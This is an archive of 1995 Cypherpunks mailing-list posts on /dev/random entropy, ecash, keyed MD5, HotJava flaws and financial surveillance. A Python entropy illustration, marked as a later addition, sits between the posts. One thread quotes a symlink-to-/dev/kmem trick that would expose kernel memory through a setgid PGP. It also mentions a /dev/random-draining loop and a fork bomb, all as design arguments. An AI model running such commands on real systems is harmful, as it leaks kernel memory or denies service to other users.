     file server more than the disk drive.
     
     2. When doing time domain measurements (Hewlett Packard had some good 
     application notes on this subject), you must consider base clock 
     jitter.  I'll try to illustrate with a diagram:
     
     actual event:            V                    V
     clock granularity:  /...../...../...../...../...../...../
     
     the problem is that no matter how small the basic clock unit is 
     (symbolized by "/", above), you can't be sure how much of that unit 
     has passed when the event (symbolized by "V", above) occurs.  For 
     example, on the original IBM PC, clock interrupts occurred about 18.2 
     times per second (55ms interval).  In that architecture, you can't 
     time an event and have an uncertainty of less than 2 times 55ms.
     
     If you propose using a special hardware random generator, you have a 
     different set of problems:
     
     1. You need to buy and install hardware on many different platforms -- 
     you don't always have access to do that.
     
     2. Many earlier posts on this subject pointed out that removing bias 
     was important.  In that case, you need to continuously test and 
     recertify the hardware random generator for randomness.  In order to 
     do that, you need to have so much knowledge about generating and 
     testing random numbers in software that you might as well use a 
     software solution in the first place.
     
     Good luck





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 1 Nov 1995 02:38:17 +0800
To: cypherpunks@toad.com
Subject: Re: ecash remailer
Message-ID: <Pine.3.89.9510311704.A11286-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Hal wrote:

> Also, I believe in normal use Digicash coins are marked as being for a
> specific recipient.  This is not certain since no details have been
> released.  And apparently it can be worked-around by the spender by
> marking the recipient as just "@" (or some such string).

Yep, it's optional. You can specify the account id of the recipient, in 
which case it's encrypted into the ecash message somehow, or you can 
leave it blank, in which case anyone can deposit it in their account. Or 
at least that's what the DigiCash people told me.

I think it only works that way if you select email payment, when it gives 
you a box for the account id to pay to.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frezza@interramp.com (Bill Frezza)
Date: Wed, 1 Nov 1995 07:49:56 +0800
To: cypherpunks@toad.com
Subject: Electronic Warfare
Message-ID: <v01530500acbc17d17da1@[38.12.14.130]>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,

With your indulgence I would like to post this short essay here, which was
stimulated by a recent report posted on this list that was passed on to me.
The essay just ran as an op-ed piece in this week's issue of Communications
Week. I would like to thank and acknowledge the author of the original
report as well as encourage the cypherpunk community to keep me posted on
related issues. (I cannot keep up with the volume on this list and, hence,
am not a subscriber.)

Thank you,

Bill Frezza
Columnist
Communications Week
Network Computing Magazine
frezza@interramp.com

---------------------------------------------------------------------------

ELECTRONIC WARFARE WAGES ON - AND YOU'RE THE TARGET

Although the flap over the Clinton administration's attempt to promote
escrowed-key encryption systems like Clipper has temporarily faded, the war
on electronic privacy continues.   As proceedings at the Fourth
International Conference on Money Laundering, Forfeiture, Asset Recovery,
Offshore Investments, the Pacific Rim, and International Financial Crimes
reveal, there has been no let up in our government's efforts to blockade
the cyber-frontier.

No, you won't learn much from the Wall Street Journal or the New York
Times, written by journalist-generalists who have no clue about where this
technology is heading.  The Feds have become so skilled at manipulating the
Old Media that stories about electronic privacy  invariably center on the
latest drug kingpin, pedophile, or domestic terrorist.  Attacking these
universally abhorred enemies of the people not only makes for good
headlines but keeps privacy advocates off balance as they are forced to
defend abstract rights using loathsome examples.  But if you tune in to the
Cypherpunks mailing list (majordomo@toad.com) you can get some excellent
first hand reports from the front.

In the relatively short period since the passage of the Bank Secrecy Act,
which, among other things, obliges banks to file Suspicious Activity
Reports on its customers, banks have become virtual deputies in the
treasury department's war on uncontrolled financial transactions.  And this
war is increasingly spilling into cyberspace.

The conference underscored the fact that, paradoxically, we are heading not
toward more specific and well defined transaction monitoring regulations,
but less.  How so?  The problem with making regulations precise is that
what software algorithms can define, other algorithms can evade.  Instead,
regulation by "raised eyebrow" is becoming the norm.  Federal bank
examiners have been given significant latitude to invoke draconian
penalties against uncooperative banks.  Because bank officers have few
due-process protections under this regime, it is no surprise that most of
them have become sniveling toadies.  The objective is to insure that banks
"voluntarily" introduce even more aggressive, unpredictable, and intrusive
monitoring than the government would ever dare mandate.  And to make sure
nothing slips through the cracks, human surveillance will be supplemented
with artificial-intelligence agents that can perform pattern analysis on
the aggregate flow of electronic transactions, flagging anything remotely
suspicious.  George Orwell would be impressed.

Lest you think that all of this is motivated solely by the drug war,  a
visit to the Treasury Department's Financial Crimes Enforcement Network
(FinCEN) homepage
(http://www.ustreas.gov/treasury/bureaus/fincen/facts.html) should open
your eyes.  This battle is not just about drug prohibition, a crime the
Treasury Department would have to invent if it didn't already exist.  The
real struggle is about the future of tax compliance, and it has you in its
sights.

A famous Revolutionary War era pamphleteer, writing under the pseudonym
"Brutus", perhaps said it best 200 years ago when he wrote - "The national
government through its taxing power will introduce itself into every corner
of the city and country.  It will take cognizance of the professional man
in his office or his study;  it will watch the merchant in his store;  it
will follow the mechanic to his shop and his work, and will haunt him in
his family and his bed;  it will be the constant companion to the
industrious farmer in his labour;  it will penetrate into the most obscure
cottage;  and finally it will light upon the head of every person in the
United States.  To all these different classes of people and in all these
circumstances on which it will attend them, the language in which it will
address them will be GIVE! GIVE!"

What Brutus didn't know and what the cypherpunks foresee is that one day
strong encryption will make it impossible to spy on our activities in
cyberspace.  Heightened conflict is inevitable.  Expect the rhetoric to get
a lot hotter as the government spinmeisters labor to keep us focused on
public enemies while frantically trying to keep its hand in every citizen's
pocket and its eyes on every bankbook.

# # #
COPYRIGHT CMP PUBLICATIONS 1995

Bill Frezza is president at Wireless Computing Associates and co-founder of
the online forum DigitaLiberty.  The opinions expressed are his own. Frezza
can be reached at frezza@interramp.com.

 ------------------------------------
| Wireless Computing Associates, Inc.
| 704 Stoney Hill Rd., Suite 155
| Yardley, PA 19067
| ph 215-321-0929, fax 215-321-0490
| urgent Email: frezza@radiomail.net
| bulk Email: frezza@interramp.com
 ------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 1995 04:42:06 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510302351.AA28243@zorch.w3.org>
Message-ID: <199510312331.SAA03949@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 	Do not spec Keyed MD5, it is a complete loser. It is actually weak
> against a number of attacks. There are much better constructs for creating
> a keyed digest. There are much better ways of creating a digest than using
> a hash function as the base.

What??? 

A keyed version of MD5 is the base authentication mechanism in IPSP
and it has been heavily examined by a number of very good
cryptographers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 1 Nov 1995 08:24:14 +0800
To: owner-cypherpunks@toad.com
Subject: Re: Need Mail-to-News gates
Message-ID: <9510312340.AA12914@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Until I can write a script to pull all the newsgroups from the active 
>file and place aliases for them in sendmail, the only way to use it is 

The "gag" program that comes with my news/mail gateway software known
as newsgate can do this automatically.  email to rsalz@nntp.com for
a copy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 1 Nov 1995 08:41:48 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510312348.AA12963@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>GSS is often brought up on occasions like this. I have never seen an architectural
>overview of what it is trying to achieve for me or how. When I am provided 
>with a clear definition of what it is I hope to arrive at a clear explanation 
>of why I'm not using it. Unfortunately the RFC process strips the rationale
>part out of the specs. 

You don't understand it, but once you do you can explain why you're not
using it?  Do you really mean that, or am I misunderstanding?

Many of the GSSAPI principals are in the Boston area:  John Linn at
OpenVision in Cambridge, John Wray at Digital in Littleton, Ted Ts'o
and Marc Horowitz at MIT, etc.

If you would like to have a discussion, face-to-face or phone, let
me know and I will try to work something out.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 1 Nov 1995 08:31:24 +0800
To: cypherpunks@toad.com
Subject: Please send cash
Message-ID: <9510312359.AA21087@all.net>
MIME-Version: 1.0
Content-Type: text


I just picked this up from the Risks forum:

> Date: Mon, 30 Oct 1995 16:14:59 -0500
> From: Drew Dean <ddean@CS.Princeton.EDU>
> Subject: HotJava 1.0 alpha 3 security issues
> 
> We have found several security problems in the 1.0 alpha 3 release of
> HotJava from Sun Microsystems.  The two most important problems are that
> HotJava does not enforce the stated limits on where an applet can connect to
> (an applet can talk to any place with which you have IP-level connectivity),
> and HotJava is vulnerable to a man-in-the-middle attack, where someone can
> watch your web-surfing, both seeing your requests, and the content that you
> receive.

Two of the Java attacks I outlined in this forum and got abuse for.

> While HotJava prevents applets from actively opening connections that
> violate the user-selected security policy, it allows an applet to accept
> connections from anywhere.  At this point, an applet only has to use any one
> of a number of channels to communicate where it is, and have the remote end
> do the active open.
> 
> HotJava also allows an applet to set the proxy servers that the browser
> uses.  This opens up a huge hole for anyone concerned about the privacy of
> their web surfing.

Attacks 31-49 work here.

> Please note that these bugs are specific to the 1.0 alpha 3 release, and are
> _not_ bugs in the Java language itself, nor do they apply to Netscape 2.0
> beta 1J, which doesn't permit network connections.  We have notified Sun of
> these problems, and are presently writing a paper on these and other issues.
> We will make more information available on our Web page after we hear back
> from Sun.

Drat - Sun doesn't offer awards.

> 
>     http://www.cs.princeton.edu/~ddean/java/
> 
> Drew Dean				Dan Wallach
> ddean@cs.princeton.edu			dwallach@cs.princeton.edu

Inquiring minds want to know.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Karl Marx <karlmarx@illumini.demon.co.uk>
Date: Wed, 1 Nov 1995 04:38:50 +0800
To: cypherpunks@toad.com
Subject: Nautullus Voice Encryption
Message-ID: <9510311908.aa17855@relay-3.mail.demon.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

I don't know if any of you have heard of the voice encryption program 
called Nautilus, but the full version was supposedly released 
some time ago. Can someone please point me to a site where it is 
available?

Thanks....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 1 Nov 1995 05:48:31 +0800
To: cypherpunks@toad.com
Subject: InfoWar
Message-ID: <199510311811.TAA18276@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Wall Street Journal, October 31, 1995, p. B1.


It's Time You Became A Manager of Change, The Consultants Say
[Excerpts]


Rapid innovation and product introduction require a nimbleness
lacking in many corporate bureaucracies.

"There's an intrinsic need to improve your effectiveness at
managing change -- whatever form it takes," says David Nadler,
chairman of the New York-based Delta Consulting Group.

Change-management boosters are also telling managers to learn
about "knowledge management" as a means of achieving their new
goals.

Knowledge management attempts to make fuller use of internal
information networks. The consulting units of Arthur Andersen,
Ernst & Young and Price Waterhouse are peddling systems to
collect, store and distribute knowledge. Andersen designates
"knowledge managers" who monitor traffic through its Lotus
Notes e-mail software and store valuable information on a CD-
ROM. The disk contains 16,000 pages on everything from
performance measurements to employee motivation.

One problem with the system: "It's so difficult to tie
knowledge-management systems to bottom-line improvement," says
C. Jack Grayson Jr., whose American Productivity and Quality
Center co-sponsored a knowledge-management symposium with
Arthur Andersen. "That just feeds suspicions that it's just
another fad."

It's also difficult to get employees to contribute to the
information pool [fearful their jobs may vanish after overt
knowledge-transfer, hence, the appeal to managers for systems
that covertly siphon knowledge and record grounds for
dismissal].

------

WSJ, October 24, 1995, p. A24.


Privacy Laws Are Lax On New Technology, Federal Agency Says 

Washington -- Inconsistent privacy laws let companies sell
sensitive information about consumers who use new
communications technologies, the Clinton administration
warned.

In a report, the Commerce Department's National
Telecommunications and Information Administration called on
communications companies to tell customers if they plan to
sell information about what they watch or whom they call, and
to make it easy for customers to squelch the disclosure of
sensitive information.

Federal regulations allow people to ask their phone company to
keep information confidential, but the rule generally doesn't
apply to small phone companies or wireless phones, according
to the report. Laws that prevent video stores from disclosing
what movies customers watch don't apply to pay-per-view
services by satellite-television providers. And while a 1986
law prevents on-line computer services from snooping into
electronic mail, it doesn't prevent the services from selling
information about who e-mailed whom, and what the topic was,
the report noted.

The Commerce Department stopped short of calling for
legislation to close the gaps. But "if industry doesn't do it,
consumers will demand that the government do it," predicted
Larry Irving, assistant commerce secretary for communications
and information.

Industry representatives played down the privacy loopholes.
Ronald Plesser, a Washington attorney who represents online
services and direct marketing firms, said, "I know of no
example of anybody trafficking in e-mail descriptions." A
spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
do not release names of customers that ordered movies.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 1 Nov 1995 02:48:07 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510311715.TAA05821@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>    How about SetGID? We were going for 660 root.kmem.
> 
> Bad idea; anyone who can run PGP could then get instant access to kmem

Fooey. Of course. Scratch that plan.

> 	cd /tmp
> 	ln -s /dev/kmem foo
> 	pgp -e tytso foo
> 	rm foo
> 	pgp foo.pgp

Eeeeek!

>    ? "Gut feel" suggests to me that large amounts of "predicted" input might
>    be worse than the normal sort of system noise you have been using.
> 
> But keep in mind that what we're doing is XOR'ing the input data into
> the pool.  (Actually, it's a bit more complicated than that.  The input
> is XOR'ed in with a CRC-like function, generated by taking an
> irreducible polynomial in GF(2**128).  But for the purposes of this
> argument, you can think of it as XOR.)  So since you don't know what the
> input state of the pool is, you won't know what the output state of the
> pool is.

I chatted with a colleague at work, and he helped bend my mind right.
I had the mistaken notion that adding lots of data would "overflow"
and "dilute" the entropy to an attackable state.

>    Is this millisecond accuracy quantifiable in terms of bits of entropy?
>    if so, the ethernet is surely safe?
> 
> Well, no.  If you're only using as your timing the 100Hz clock, the
> adversary will have a better timebase than you do.  So you may be adding
> zero or even no bits of entropy which can't be deduced by the adversary.

In a 386 or a 486 (under FreeBSD at least) there is a 1MHz clock available.
How would _this_ be? On the Pentium there is the <whatsit?> register
which will give the board's oscillator (or 90 MHz) I believe.

> This is even worse in the PGP keyboard timing case, since the adversary
> almost certainly can find a better time resolution to measure your
> incoming packets when compared to the timing resolution that most
> programs have.  Far too many Unix systems only make a 100Hz clock
> available to the user mode, even if you have a better quality high
> resolution timing device in the kernel (for example, the Pentium cycle
> counting register).

Ah yes - _that_ register. :-)

What then is a body to do? Preserve all _verifiable_ randomness like gold?
Dish it out under some quota? A denial of service attack would be

forever {
	cat /dev/random > /dev/null
}

Severely limiting most decent folk's chance at getting PGP to work.

Right now I am considering making a piece of cheap hardware to deliver
noise to a digital input. (Electronics is a stagnant hobby of mine)
Interested? I may knock up a prototype in a month or so...

> The problem is that in order to do this requires making assumptions
> about what the capabilities of your adversary are.  Not only does this
> change over time, but certain adversaries (like the NSA) make it their
> business to conceal their capabilities, for precisely this reason.

Can they predict thermal noise in a cheap transistor? ]:->

> So I like to be conservative and use limits which are imposed by the
> laws of physics, as opposed to the current level of technology.  Hence,
> if the packet arrival time can be observed by an outsider, you are at
> real risk in using the network interrupts as a source of entropy.
> Perhaps it requires building a very complicated model of how your Unix
> scheduler works, and how much time it takes to process network packets,
> etc.  ---- but I have to assume that an adversary can very precisely
> model that, if they were to work hard enough at it.

This is a strong argument for some form of specialised noise source.
I have read of methods of getting this from turbulent air flow in a hard
drive (an RFC, I believe).

> People may disagree as to whether or not this is possible, but it's not
> prevented by the laws of physics; merely by how much effort someone
> might need to put in to be able to model a particular operating system's
> networking code.  In any case, that's why I don't like depending on
> network interrupts.  Your paranoia level may vary.

If I was running Fort Knox, I'd probably use Radioactive decay...

(From my experience working at a cyclotron facility - these SOB's are
_*RANDOM*_)

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key
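
The two entropy arguments in the exchange above, together with the clock-granularity point made elsewhere in this thread, worked through as an added example (not part of the original post, and not code from any kernel or from PGP). The 16-bit pool, the CRC-16-CCITT polynomial used for the stir step, the 200 microsecond latency bound, the sample timestamps and all function names are assumptions constructed for illustration.

```python
import math

POOL_BITS = 16                    # toy pool; real pools are far larger
MASK = (1 << POOL_BITS) - 1
POLY = 0x1021                     # CRC-16-CCITT taps, chosen for illustration only
KNOWN_INPUT = bytes(range(16))    # constructed input the adversary knows or chose


def stir_xor(state, byte):
    """CRC-like stir: multiply the pool by x modulo POLY, then XOR the input in."""
    carry = state >> (POOL_BITS - 1)
    state = (state << 1) & MASK
    if carry:
        state ^= POLY
    return state ^ byte


def stir_overwrite(state, byte):
    """Broken alternative: shift the input in, pushing old pool bits out."""
    return ((state << 8) | byte) & MASK


def possible_states_after(stir, known_input):
    """Count the pool states an adversary must still consider after the pool
    has absorbed input he knows completely, if every start state was possible."""
    finals = set()
    for start in range(1 << POOL_BITS):
        s = start
        for b in known_input:
            s = stir(s, b)
        finals.add(s)
    return len(finals)


def tick(t_us, tick_us):
    """Reading of a clock with granularity tick_us for an event at t_us."""
    return t_us // tick_us


def candidate_readings(seen_us, latency_max_us, tick_us):
    """Clock readings the host may have recorded for a packet that an outside
    observer saw on the wire at seen_us (1 us resolution), knowing only that
    the host timestamps it between 0 and latency_max_us later."""
    return {tick(seen_us + d, tick_us) for d in range(latency_max_us + 1)}


def unknown_bits(n_candidates):
    """Upper bound on the entropy left when n candidates remain possible."""
    return math.log2(n_candidates)


if __name__ == "__main__":
    # 1. Known input stirred in with the XOR/CRC-like step permutes the pool
    #    states, so the adversary's uncertainty about the pool is unchanged.
    n_xor = possible_states_after(stir_xor, KNOWN_INPUT)
    # 2. A stir that overwrites old bits really does flush the pool.
    n_over = possible_states_after(stir_overwrite, KNOWN_INPUT)
    print(f"xor stir:       {n_xor} states left ({unknown_bits(n_xor):.1f} bits)")
    print(f"overwrite stir: {n_over} states left ({unknown_bits(n_over):.1f} bits)")

    # 3. Timing samples: what the observer cannot deduce depends on how the
    #    host's clock tick compares with the latency the observer cannot see.
    cases = [
        ("55 ms tick (18.2 Hz)", 1_234_567, 55_000),
        ("100 Hz, mid-tick", 1_234_567, 10_000),
        ("100 Hz, near tick edge", 1_239_900, 10_000),
        ("1 MHz", 1_234_567, 1),
    ]
    for label, seen, tick_us in cases:
        n = len(candidate_readings(seen, 200, tick_us))
        print(f"{label:24s} {n:4d} candidate readings, "
              f"at most {unknown_bits(n):.2f} bits")
```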




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Wed, 1 Nov 1995 06:59:10 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510311715.TAA05821@grumble.grondar.za>
Message-ID: <47661e$6li@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510311715.TAA05821@grumble.grondar.za>,
Mark Murray <mark@grondar.za> wrote:
> forever {
> 	cat /dev/random > /dev/null
> }
> 
> Severely limiting most decent folk's chance at getting PGP to work.

Ideally, if two processes are trying to read /dev/random at the same time,
both would get data at half-speed.  Doesn't it work that way already?
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Wed, 1 Nov 1995 07:13:35 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510311855.AA00379@zorch.w3.org>
Message-ID: <199510312230.OAA15622@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995 13:55:34 -0500, you wrote:


> MD5 is pretty well entrenched in IETF circles

Agreed, but that doesn't make it appropriate here.

> and since RSAREF only
> provides MD2, MD4 and MD5 there has to be an option to use at least
> one of them.

Why?  Is there some REAL requirement that HTTP-NG be implementable
using only RSAREF for crypto?

> MD5 is the best of that set IMHO.

No argument -- but it's still too short for most hash applications.
I'd much rather see hashes that everyone agrees are more than long
enough for the foreseeable future  -- and I don't think you'll find
that consensus for MD5.

Of course, whether a particular hash is as secure as it can be for a
given length is a separate question.

  <references snipped>

Thanks for the pointers. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 1 Nov 1995 07:12:33 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510312115.XAA06361@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>  In a 386 or a 486 (under FreeBSD at least) there is a 1Mhz clock available.
>  How would _this_ be? On the Pentium there is the <whatsit?> register
>  which will give the board's oscillator (or 90 MHz) I believe.
> 
> What's HZ set at for FreeBSD?  Most of the x86 Unixes have generally
> used HZ set at 100, because the interrupt overhead on a x86 isn't cheap,
> and so you want to limit the number of clock interrupts.

There are two interrupts, one at 100Hz and the other at 128Hz (the second
gets pushed into the +-1K region during profiling).

> You can sample the timing clock, but it turns out to be rather expensive
> to do so; several I/O instructions, which will require several delays if
> they have to go through your 8 MHz ISA bus.  We've moved away from using
> the hardware clock on the 386 because of the overhead concerns.  On the
> Pentium, we use the clock cycle counter.

Drat. Methinks I need to follow suit, but I value that 1Mhz...

> Well, verifiable randomness really is like gold.  It's a valuable
> resource.  On a time-sharing system, where you really want to equitably
> share *all* system resources perhaps there should be a quota system
> limiting the rate from which a user is allowed to "consume" randomness.

True. VMS could probably do this. <Ducks bricks>

> On the other hand, most Unix systems *aren't* great at doing this sort
> of resource allocation, and there are enough other ways of launching
> denial of service attacks.  "while (1) fork();" will generally bring
> most systems to their knees, even in spite of limitations of the number
> of processes per user.  Most Unix systems don't protect against one user
> grabbing all available virtual memory.  And so on....

Getting there (I think).

> There's nothing special about /dev/random in this sense; it's just
> another system resource which can be abused by a malicious user, just
> like virtual memory or process table slots.

True. Good policing never hurt.

>    This is a strong argument for some form of specialised noise source.
>    I have read of methods of getting this from turbulent air flow in a hard
>    drive (an RFC, I believe).
> 
> Yes, ultimately what you need is a good hardware number generator.
> There are many good choices; from radioactive decay, noise diodes, etc.

The idea that I like the most so far is to generate noise, but filter
it through an LPF to get frequencies less than (say) 500kHz. Put that
through a Schmitt trigger to get decent squarewaves and then into an
N-bit hardware shift register with some XOR feedbacks to mix this.
Voila! Nice numbers on demand. Shouldn't cost more than a few <shekels>...

> Short of good hardware sources, the other really good choice is
> unobservable inputs.  Hence, the Linux driver is hooked into the
> keyboard driver, and the various busmice drivers.  Those are really
> wonderful sources of randomness, since they're generally not observable
> by an adversary, and humans tend to be inherently random.  :-)

Doesn't work on servers in locked rooms... :-(
With those, as long as the machines are secure, (ie plebs cannot watch
and time raw packets) the network card is OK. The server may not be on
transit ethernet AT ALL.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Nov 1995 02:41:07 +0800
To: cypherpunks@toad.com
Subject: DIR_ty$
Message-ID: <199510301238.HAA06263@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


10-30-95.  In slave to Orlin Crabbe's "The Money Laundromat," 
The NYPaper has a Page One lead story:


"Cali Drug Cartel Using U.S. Business to Launder Cash. 105 
Firms Suspected. Trade Related Schemes Said to Have Moved $3 
Billion Through Companies."


DIR_ty$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 2 Nov 1995 09:29:16 +0800
To: "Tom Bell" <BELL@odo.law.udayton.edu>
Subject: Re: S. 1284 To Amend (C) Act
Message-ID: <9510302258.AA00471@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  S. 1284,  s1201:  "No person shall import, manufacture or distribute
>  any device, product, or component incorporated into a device or
>  product, or offer or perform any service, the primary purpose or
>  effect of which is to avoid, bypass, remove, deactivate, or otherwise
>  circumvent, without the authority of the copyright owner or the
>  law, any process, treatment, mechanism or system which prevents
>  or inhibits the violation of any of the exclusive rights of the
>  copyright owner under section 106."

IANAL, but I thought these types of laws were already tested and deemed  
unconstitutional in cases involving video-tape copying boxes, dual video  
cassette dubbing decks, SCMS 'scrubbers', etc...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 2 Nov 1995 09:28:57 +0800
To: Simon Spero <cypherpunks@toad.com
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
Message-ID: <9510302351.AA28243@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Simon,

	Do not spec Keyed MD5, it is a complete loser. It is actually weak
against a number of attacks. There are much better constructs for creating
a keyed digest. There are much better ways of creating a digest than using
a hash function as the base.

	There is some work by Phil Rogaway on making keyed digest functions
which I strongly recommend people look at. I can post a paper on the subject if 
people are interested.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 1 Nov 1995 11:07:02 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash on Scientific American
In-Reply-To: <Pine.SUN.3.90.951031015937.2277C-100000@dfw.net>
Message-ID: <Pine.LNX.3.91.951031091650.2874A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Aleph One wrote:

> Another thing before I go to bed. In the November issue of Scientific
> American the Essay column written by Anne Eisenberg is titled "Doing
> Business on the Net". It's short (one page), but mentions PK crypto,
> touches upon the dangers that online transactions pose to privacy, and
> talks a bit about ecash. Sadly there is no mention of ITAR *sigh*

I was impressed with the slant of this essay.  I remember another article
on different forms of digital cash in Popular Science where the author mentions
ecash and the only thing said about it was that it could aid drug-traffickers.
I was glad to see the article in Scientific American that gives the positive
side of ecash.  It did seem from some of the responses to the Popular Science
article that most people disagreed with the author's point of view on 
anonymous digital cash. 

`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 1 Nov 1995 13:01:11 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Important Digital Cash Question...
In-Reply-To: <v02120d06acbab250b4e9@[199.0.65.105]>
Message-ID: <199510310237.NAA00348@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

rah@shipwright.com (Robert Hettinga) writes:
...
> Wait, wait! I have another one. I call digital cash bankers "underwriters",
...
> So, we need a "U" name...


David HM Spector <spector@zeitgeist.com> replies:
...
> um... perhaps, Ursula the Underwriter...?
...

How about Uhura?

(Or should Uhura be Mitch, 'cause she can monitor your conversations?)

(Mitch or Witch - Woman In The CHannel?)


OK, forget it.


How about Sam the banker (Sam as in Samuel Clemens)?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMJWL2CxV6mvvBgf5AQGbPAP/Z4wMAPokthvWygKdLEZ0vTAFTDti4sUp
4R57GrY5ZHwyJwM2bI/Xgvb30sJnVXzmHkahOouFD/6RrnW4kydouhaNFuI4Eev/
FdPxLaKz2j37U8fnC5Jo3zyRT+PZLqba6lwlcAESNNUgfEsIkM2cn3Rw72p4dnrc
Iqs5Wmo5exk=
=3MRB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@cthulhu.engr.sgi.com>
Date: Wed, 1 Nov 1995 10:02:57 +0800
To: perry@piermont.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199511010026.TAA22659@jekyll.piermont.com>
Message-ID: <3096CA5A.41C6@engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Tom Weinstein writes:
> > One problem with this scheme is that if multiple processes have
> > /dev/random open you can block unexpectedly.  If I try to avoid
> > blocking by first checking if entropy is available there's a race
> > condition if another process reads from the device.  Is there
> > another way to avoid blocking?
> 
> > Yeah. Use non-blocking I/O. It's in every version of Unix I've touched
> for over a decade.

I guess I wasn't clear.  The message I was replying to defined how
the driver decided whether to block.  Since I don't have the source
code, I was wondering whether non-blocking I/O worked for this driver.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 10:03:15 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510311650.AA32634@zorch.w3.org>
Message-ID: <Pine.SOL.3.91.951031170143.1256A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


